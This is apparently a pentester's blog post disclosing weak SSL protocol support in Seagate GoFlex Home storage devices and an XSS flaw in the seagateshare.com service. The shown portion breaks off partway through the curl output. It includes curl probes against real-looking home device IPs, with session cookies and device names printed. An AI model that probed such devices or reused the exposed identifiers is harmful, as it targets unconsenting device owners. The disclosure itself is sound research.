tag:blogger.com,1999:blog-300987582024-03-05T21:08:05.383-08:00Pentester's BlogThis tangential research relates to my avocation.Aditya K Soodhttp://www.blogger.com/profile/10592122467317696329noreply@blogger.comBlogger73125tag:blogger.com,1999:blog-30098758.post-77678993146163133092018-01-22T13:33:00.001-08:002018-01-22T14:01:34.268-08:00Seagate GoFlex Home Storage Devices: Main-in-the-Middle (MitM) Attacks and Cross-site Scripting in SaaS Web App ! <div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><b><u><i><br /></i></u></b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxC6hKIgQdzcb1oLAtSVw_D3fGx3WnLo92KKeYMUuP2JoFwctFOQS8zJ6m9mBqC9unm-usepaSuxtcx-SQMFIKbbWM_kcypF7pgweW3wUCSfcadSdZjVKjj43DC2T6onpjWP4iMg/s1600/goflex_home_hero_white_hi1.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="1280" data-original-width="1600" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxC6hKIgQdzcb1oLAtSVw_D3fGx3WnLo92KKeYMUuP2JoFwctFOQS8zJ6m9mBqC9unm-usepaSuxtcx-SQMFIKbbWM_kcypF7pgweW3wUCSfcadSdZjVKjj43DC2T6onpjWP4iMg/s400/goflex_home_hero_white_hi1.jpg" width="400" /></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;">
<br />
<style type="text/css">
p.p1 {margin: 0.0px 0.0px 0.0px 0.0px; text-align: center; font: 12.0px 'Helvetica Neue'; color: #454545}
span.s1 {text-decoration: underline}
span.s2 {text-decoration: underline ; color: #e4af0a}
</style>
<br />
<div class="p1">
<blockquote class="tr_bq">
<h2>
<i><span style="color: #660000; font-family: "georgia" , "times new roman" , serif; font-size: large;"><span class="s1"><b>More than 33000 Devices were found to be Vulnerable. During this research, </b></span><b>17000+ URLs of </b><a href="http://seagateshare.com/"><span class="s2"><b>seagateshare.com</b></span></a><b> with unique device_ids were collected.</b></span></i></h2>
</blockquote>
</div>
<div class="p1">
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">In this blog post, we will discuss about the weak encryption support in Seagate GoFlex home-based </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">storage </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">devices and XSS vulnerability in supporting SaaS based application.</span></div>
</div>
<b id="docs-internal-guid-bc295b3e-1fbf-c045-9ee3-9c13224d9dce" style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Overview</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The FreeAgent® GoFlexTM Home network storage system lets you use one external drive for all </span><br />
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">the </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">computers in your home. With enough capacity to support multiple computers and users, you </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">can easily </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">store all of your files in one centralized location, while automatically and continuously </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">backing up the files </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">and folders on every computer in your home. </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">For more details about, Seagate </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">has GoFlex home-base storage </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">system, refer the links below:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<ul>
<li><a href="http://www.seagate.com/support/external-hard-drives/network-storage/goflex-home/" style="font-family: Cambria; font-size: 11pt; text-decoration: none; white-space: pre;">http://www.seagate.com/support/external-hard-drives/network-storage/goflex-home</a></li>
<li><a href="http://support.goflexhome.hipserv.com/en/security/" style="font-family: cambria; font-size: 11pt; text-decoration-line: none; white-space: pre;"><span style="color: #1155cc; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">http://support.goflexhome.hipserv.com/en/security/</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"> </span></li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">Working</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">It has been noticed that Seagate provides SaaS based web service at: </span><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 11pt; font-style: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"><a href="https://www.seagateshare.com/" style="text-decoration: none;">https://www.seagateshare.com/</a></span><br />
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">that </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">allows remote users of the GoFlex home-based device (or service) to upload and store data on </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">the cloud. </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">The "</span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><i><b>seagateshare.com"</b></i></span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">has an IP address 54.225.93.0 which on reverse DNS pointer </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">(PTR) lookup points </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">to: “ec2seagate.axentra.com”. The “ec2seagate.axentra.com” hosts web </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">server </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">as “</span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; font-style: italic; vertical-align: baseline; white-space: pre;">Apache/2.2.24 (Amazon) Server at s1.seagateshare.com Port 80”. </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; font-style: italic; vertical-align: baseline; white-space: pre;"><br /></span>
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; font-style: italic; vertical-align: baseline; white-space: pre;">The web portal is shown below:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="411" src="https://lh5.googleusercontent.com/tHs0SPHHh_1iMs3dDSgLksgBGsCuZrIr_7OH3h_KfnFJdnFmrXbTbMeabGxZCPl91Cy9Gz7jA8VC24DVPKEd0KAoAvjkQ69l5J9II2eTX1kn2dWQ2a8vOlR6eZUKIoL9rYzZrJYK" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="624" /></span><span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">It has been found that the GoFlex firmware has a built-in HTTP server which requires port </span><br />
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">forwarding to </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">be established via router so that it can be connected to the </span><a href="http://seagateshare.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">. </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">When a user opens </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">the </span><a href="http://seagateshare.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;"> and provides the device_id, it syncs with the GoFlex </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">device and data can be accessed. </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">Basically, GoFlex home system requires a port forwarding to </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">be enabled from the router. When the remote </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">users accesses the the HTTP service by opening </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">the router IP address in the browser, it redirects the </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">browser to the </span><a href="http://seagateshare.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;"> for </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">remote access. The service automatically maps the user’s account </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">based on the router’s </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">IP address and additional variants. </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">An example is shown below:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">$ curl -v </span><a href="https://89.103.61.141/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://89.103.61.141/</span></a><span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;"> --insecure</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Trying 89.103.61.141...</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* TCP_NODELAY set</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Connected to 89.103.61.141 (89.103.61.141) port 443 (#0)</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* TLS 1.0 connection using TLS_DHE_RSA_WITH_AES_256_CBC_SHA</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Server certificate: localdomain</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> GET / HTTP/1.1</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> Host: 89.103.61.141</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> User-Agent: curl/7.51.0</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> Accept: */*</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* HTTP 1.0, assume close after body</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< HTTP/1.0 302 Found</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Date: Sat, 07 Oct 2017 02:49:35 GMT</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Server: Apache/2.2.3 (Red Hat)</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-Powered-By: PHP/5.1.6</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-PHP-PID: 6399</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">< Set-Cookie: HOMEBASEID=1fbb991a210c5b7a3f130cf1b3d2215d; </span><br />
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">expires=Sunday, 08-Oct-17 02:49:35 GMT; path=/</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Expires: Sat, 07 Oct 2017 05:49:35 GMT</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Cache-Control: public, max-age=10800</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Last-Modified: Fri, 30 Sep 2011 21:03:07 GMT</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Set-Cookie: HOMEBASEID=1fbb991a210c5b7a3f130cf1b3d2215d; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Language: en-US</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Window-target: _top</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre;">< Location: </span><a href="https://www.seagateshare.com/?hipname=pimpi2" style="text-decoration: none;"><span style="background-color: yellow; color: #1155cc; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://www.seagateshare.com/?hipname=pimpi2</span></a></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< X-Axentra-Version: 10.2.0</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Length: 0</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Connection: close</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">< Content-Type: text/html; charset=UTF-8</span></div>
</td></tr>
</tbody></table>
</div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The "</span><a href="https://89.103.61.141/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;">https://89.103.61.141/</span></a><span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">" IP runs the HTTPS service and when connection is initiated, </span><br />
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">it redirects </span><span style="color: black; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">to </span><a href="http://seagateshare.com/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="color: black; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;"> as shown above. The "</span><a href="https://89.103.61.141/" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">https://89.103.61.141/</span></a><span style="color: black; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">" server </span><br />
<span style="color: black; font-family: "cambria"; font-size: 11pt; vertical-align: baseline; white-space: pre;">accepts SSLv2/SSLv3.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: underline; vertical-align: baseline; white-space: pre;">Vulnerability 1:</span><span style="background-color: transparent; color: black; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline; white-space: pre;"> Weak Encryption Protocol Support: SSLv2 /SSLv3 </span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">It has been discovered that embedded server still supports SSLv2 / SSLv3 whereas the </span><br />
<a href="http://seagateshare.com/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">seagateshare.com</span></a><span style="background-color: transparent; color: #222222; font-family: "cambria"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">supports SSLv3. Both these SSL versions have been deprecated as these </span><br />
<span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">are prone to man-in-the-middle </span><span style="color: #222222; font-family: "cambria"; font-size: 11pt; white-space: pre;">attacks. A complete workflow example is shown below:</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="margin-left: 0pt;">
<table style="border-collapse: collapse; border: none; width: 468pt;"><colgroup><col width="*"></col></colgroup><tbody>
<tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: yellow; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">$ curl -v https://81.107.113.155 --insecure</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Rebuilt URL to: https://81.107.113.155/</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Trying 81.107.113.155...</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* TCP_NODELAY set</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Connected to 81.107.113.155 (81.107.113.155) port 443 (#0)</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* WARNING: disabling hostname validation also disables SNI.</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* TLS 1.0 connection using TLS_DHE_RSA_WITH_AES_256_CBC_SHA</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">* Server certificate: localdomain</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> GET / HTTP/1.1</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> Host: 81.107.113.155</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: black; font-family: "cambria"; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">> User-Agent: curl/7.54.0</span></div>
<div dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
